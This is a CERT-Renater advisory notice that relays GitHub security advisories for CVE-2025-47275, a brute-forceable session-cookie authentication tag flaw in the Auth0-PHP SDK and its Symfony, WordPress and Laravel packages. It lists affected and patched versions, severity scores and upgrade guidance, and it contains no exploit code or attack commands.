Ce mail provient de l'extérieur, restons vigilants ===================================================================== CERT-Renater Note d'Information No. 2025/VULN323 _____________________________________________________________________ DATE : 20/05/2025 HARDWARE PLATFORM(S): / OPERATING SYSTEM(S): Systems running auth0/auth0-php versions prior to 8.14.0, auth0/symfony (Composer) versions prior to 5.4.0, auth0/wordpress (Composer) versions prior to 5.3.0, auth0/login (Composer) versions prior to 7.17.0. ===================================================================== https://github.com/auth0/auth0-PHP/security/advisories/GHSA-g98g-r7gf-2r25 https://github.com/advisories/GHSA-9wg9-93h9-j8ch https://github.com/advisories/GHSA-2f4r-34m4-3w8q https://github.com/advisories/GHSA-9fwj-9mjf-rhj3 _____________________________________________________________________ Brute Force Authentication Tags of CookieStore Sessions in Auth0-PHP SDK Critical femi-nonemu published GHSA-g98g-r7gf-2r25 May 15, 2025 Package auth0/auth0-php (Composer) Affected versions >=8.0.0-BETA1 Patched versions 8.14.0 Description Overview Session cookies of applications using the Auth0-PHP SDK configured with CookieStore have authentication tags that can be brute forced, which may result in unauthorized access. Am I Affected? You are affected by this vulnerability if you meet the following pre-conditions: Applications using the Auth0-PHP SDK, or the following SDKs that rely on the Auth0-PHP SDK: a. Auth0/symfony, b. Auth0/laravel-auth0, c. Auth0/wordpress, Session storage configured with CookieStore. Fix Upgrade Auth0/Auth0-PHP to v8.14.0. As an additional precautionary measure, we recommend rotating your cookie encryption keys. Note that once updated, any previous session cookies will be rejected. Acknowledgement Okta would like to thank Félix Charette for discovering this vulnerability. Severity Critical 9.1/ 10 CVSS v3 base metrics Attack vector Network Attack complexity Low Privileges required None User interaction None Scope Unchanged Confidentiality High Integrity High Availability None CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N CVE ID CVE-2025-47275 Weaknesses No CWEs Credits @Sideni Sideni Finder _____________________________________________________________________ Auth0 Symfony SDK Vulnerable to Brute Force Authentication Tags of CookieStore Sessions Critical severity GitHub Reviewed Published May 15, 2025 in auth0/symfony • Updated May 17, 2025 Vulnerability details Package auth0/symfony (Composer) Affected versions < 5.4.0 Patched versions 5.4.0 Description Overview Session cookies of applications using the Auth0 symfony SDK configured with CookieStore have authentication tags that can be brute forced, which may result in unauthorized access. Am I Affected? You are affected by this vulnerability if you meet the following pre-conditions: Applications using the Auth0 symfony SDK with version <=5.3.1 Auth0/Symfony SDK uses the Auth0-PHP SDK with version 8.0.0-BETA1 or higher and below 8.14.0. Session storage configured with CookieStore. Fix Upgrade Auth0/symfony to v5.4.0. As an additional precautionary measure, we recommend rotating your cookie encryption keys. Note that once updated, any previous session cookies will be rejected. Acknowledgement Okta would like to thank Félix Charette for discovering this vulnerability. References GHSA-9wg9-93h9-j8ch https://nvd.nist.gov/vuln/detail/CVE-2025-47275 auth0/symfony@9a7294f https://github.com/auth0/symfony/releases/tag/5.4.0 Severity Critical 9.1/ 10 CVSS v3 base metrics Attack vector Network Attack complexity Low Privileges required None User interaction None Scope Unchanged Confidentiality High Integrity High Availability None CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N EPSS score Weaknesses CWE-287 CVE ID No known CVE GHSA ID GHSA-9wg9-93h9-j8ch Source code auth0/symfony Credits @Sideni Sideni Finder _____________________________________________________________________ Auth0 Wordpress plugin Vulnerable to Brute Force Authentication Tags of CookieStore Sessions Critical severity GitHub Reviewed Published May 15, 2025 in auth0/wordpress • Updated May 17, 2025 Vulnerability details Package auth0/wordpress (Composer) Affected versions < 5.3.0 Patched versions 5.3.0 Description Overview Session cookies of applications using the Auth0 Wordpress plugin configured with CookieStore have authentication tags that can be brute forced, which may result in unauthorized access. Am I Affected? You are affected by this vulnerability if you meet the following pre-conditions: Applications using the Auth0 WordPress Plugin with version <=5.2.1 Auth0 WordPress Plugin uses the Auth0-PHP SDK with version 8.0.0-BETA1 or higher and below 8.14.0. Session storage configured with CookieStore. Fix Upgrade Auth0/wordpress plugin to v5.3.0. As an additional precautionary measure, we recommend rotating your cookie encryption keys. Note that once updated, any previous session cookies will be rejected. Acknowledgement Okta would like to thank Félix Charette for discovering this vulnerability. References GHSA-2f4r-34m4-3w8q https://nvd.nist.gov/vuln/detail/CVE-2025-47275 auth0/wordpress@06b6446 https://github.com/auth0/wordpress/releases/tag/5.3.0 Severity Critical 9.1/ 10 CVSS v3 base metrics Attack vector Network Attack complexity Low Privileges required None User interaction None Scope Unchanged Confidentiality High Integrity High Availability None CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N EPSS score Weaknesses CWE-287 CVE ID No known CVE GHSA ID GHSA-2f4r-34m4-3w8q Source code auth0/wordpress Credits @Sideni Sideni Finder _____________________________________________________________________ laravel-auth0 SDK Vulnerable to Brute Force Authentication Tags of CookieStore Sessions Critical severity GitHub Reviewed Published May 15, 2025 in auth0/laravel-auth0 • Updated May 17, 2025 Vulnerability details Package auth0/login (Composer) Affected versions < 7.17.0 Patched versions 7.17.0 Description Overview Session cookies of applications using the laravel-auth0 SDK configured with CookieStore have authentication tags that can be brute forced, which may result in unauthorized access. Am I Affected? You are affected by this vulnerability if you meet the following pre-conditions: Applications using laravel-auth0 SDK with version <=7.16.0 laravel-auth0 SDK uses the Auth0-PHP SDK with version 8.0.0-BETA1 or higher and below 8.14.0. Session storage configured with CookieStore. Fix Upgrade Auth0/laravel-auth0 to v7.17.0. As an additional precautionary measure, we recommend rotating your cookie encryption keys. Note that once updated, any previous session cookies will be rejected. Acknowledgement Okta would like to thank Félix Charette for discovering this vulnerability. References GHSA-9fwj-9mjf-rhj3 https://nvd.nist.gov/vuln/detail/CVE-2025-47275 auth0/laravel-auth0@be2c59a https://github.com/auth0/laravel-auth0/releases/tag/7.17.0 Severity Critical 9.1/ 10 CVSS v3 base metrics Attack vector Network Attack complexity Low Privileges required None User interaction None Scope Unchanged Confidentiality High Integrity High Availability None CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N EPSS score Weaknesses CWE-287 CVE ID No known CVE GHSA ID GHSA-9fwj-9mjf-rhj3 Source code auth0/laravel-auth0 Credits @Sideni Sideni Finder ========================================================= + CERT-RENATER | tel : 01-53-94-20-44 + + 23/25 Rue Daviel | fax : 01-53-94-20-41 + + 75013 Paris | email:cert@support.renater.fr + =========================================================